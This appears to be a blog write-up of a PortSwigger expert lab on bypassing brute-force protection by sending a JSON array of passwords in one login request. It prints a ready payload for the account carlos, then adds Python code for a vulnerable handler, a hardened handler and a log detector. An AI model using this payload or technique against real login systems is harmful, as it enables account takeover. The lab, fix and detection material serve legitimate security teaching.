Broken brute-force protection with multiple credentials per request is a web vulnerability in the authentication category. Because of this flaw, an attacker can submit a whole list of passwords to the web application in a single request. If any password in the list is correct, the server answers with a 302 redirect and the attacker gains access to the user's account.
Because the flaw sits in the authentication flow, an attacker captures the JSON login request and resubmits it carrying a large number of passwords at once, instead of one password per request.
Practical lab solution:

This lab is rated expert. It contains a logical flaw in its brute-force protection. To solve it, we need to brute-force the carlos account using the list of passwords that has already been provided to us.

As the screenshot above shows, when an invalid username or password is submitted, a POST request is sent to /login, and the username and password are visible in the JSON body of that request.

Next, open the list of passwords provided in the lab. In the JSON body, change the username to carlos and replace the password value with the list of passwords. You can ask ChatGPT to format the list as a JSON array, which you can then copy and paste into the request.

You will now receive a 302 response, which means you have successfully logged in to carlos's account. The lab is solved.
Don’t cry bro, here is the payload. 🙂 Don’t forget to follow me on Twitter @masaudsec.
{"username":"carlos","password":[ "123456", "password", "12345678", "qwerty", "123456789", "12345", "1234", "111111", "1234567", "dragon", "123123", "baseball", "abc123", "football", "monkey", "letmein", "shadow", "master", "666666", "qwertyuiop", "123321", "mustang", "1234567890", "michael", "654321", "superman", "1qaz2wsx", "7777777", "121212", "000000", "qazwsx", "123qwe", "killer", "trustno1", "jordan", "jennifer", "zxcvbnm", "asdfgh", "hunter", "buster", "soccer", "harley", "batman", "andrew", "tigger", "sunshine", "iloveyou", "2000", "charlie", "robert", "thomas", "hockey", "ranger", "daniel", "starwars", "klaster", "112233", "george", "computer", "michelle", "jessica", "pepper", "1111", "zxcvbn", "555555", "11111111", "131313", "freedom", "777777", "pass", "maggie", "159753", "aaaaaa", "ginger", "princess", "joshua", "cheese", "amanda", "summer", "love", "ashley", "nicole", "chelsea", "biteme", "matthew", "access", "yankees", "987654321", "dallas", "austin", "thunder", "taylor", "matrix", "mobilemail", "mom", "monitor", "monitoring", "montana", "moon", "moscow"] }
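To make the server-side mistake concrete, here is an added example that is not part of the original post and not the lab's own server code (PortSwigger does not publish it). It models the flaw described above: the handler accepts a JSON array in the "password" field, tries every element, and advances the lockout counter only once per request. Next to it sits a hardened handler that insists on exactly one string per credential field and counts every candidate as an attempt, plus a small log-review helper that flags bodies carrying more than one password. The user store, salt, secret phrase, iteration count and status codes are assumptions chosen for the demo; the 302-on-success convention follows the lab.

```python
import hashlib
import hmac
import json

# Constructed demo user store: only a salted PBKDF2 hash is kept. The salt,
# secret phrase and iteration count are assumptions for this example.
_SALT = b"constructed-demo-salt"
_ITERATIONS = 1_000  # lowered for the demo; use a far higher count in production


def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), _SALT, _ITERATIONS)


USERS = {"carlos": _hash("constructed-secret-phrase")}
MAX_FAILED = 3  # lock the account after this many failed candidates


def _matches(username: str, candidate: str) -> bool:
    stored = USERS.get(username)
    if stored is None:
        _hash(candidate)  # unknown users cost the same time as known ones
        return False
    return hmac.compare_digest(_hash(candidate), stored)


def vulnerable_login(raw_body: str, failures: dict) -> int:
    """Models the lab's flaw: "password" may be a JSON array, every element is
    tried, and the lockout counter moves once per request, not per candidate."""
    body = json.loads(raw_body)
    username = body.get("username")
    candidates = body.get("password")
    if isinstance(candidates, str):
        candidates = [candidates]  # a list passes straight through this branch
    if failures.get(username, 0) >= MAX_FAILED:
        return 403  # locked, but only after MAX_FAILED whole requests
    for candidate in candidates:
        if _matches(username, candidate):
            return 302  # success redirect, as in the lab
    failures[username] = failures.get(username, 0) + 1
    return 200  # login page re-rendered with an error


def hardened_login(raw_body: str, failures: dict) -> int:
    """Hardened form: each credential field must be exactly one string, so one
    request is one attempt and the lockout counts candidates, not requests."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return 400
    username = body.get("username")
    candidate = body.get("password")
    if not isinstance(username, str) or not isinstance(candidate, str):
        return 400  # reject arrays, objects, numbers and null outright
    if failures.get(username, 0) >= MAX_FAILED:
        return 403
    if _matches(username, candidate):
        failures.pop(username, None)  # clear the counter on a genuine login
        return 302
    failures[username] = failures.get(username, 0) + 1
    return 200


def candidate_count(raw_body: str) -> int:
    """Detection aid for log review: number of password values in one body.
    Anything above 1 is a multiple-credentials-per-request attempt."""
    password = json.loads(raw_body).get("password")
    if isinstance(password, list):
        return len(password)
    return 1 if isinstance(password, str) else 0


if __name__ == "__main__":
    batch = '{"username":"carlos","password":["123456","password","constructed-secret-phrase"]}'
    print("vulnerable:", vulnerable_login(batch, {}))  # 302: the whole list cost one attempt
    print("hardened:  ", hardened_login(batch, {}))    # 400: array rejected before any check
    print("candidates:", candidate_count(batch))       # 3: worth an alert in request logs
```

The type check in hardened_login is the fix that matters: once a request can carry only one password, the per-account counter behaves as designed and the lockout engages after three wrong guesses regardless of how the attacker packages them. candidate_count is the matching detection: a JSON login body whose password field is an array should never occur in legitimate traffic, so a count above one in access logs is a high-confidence signal on its own.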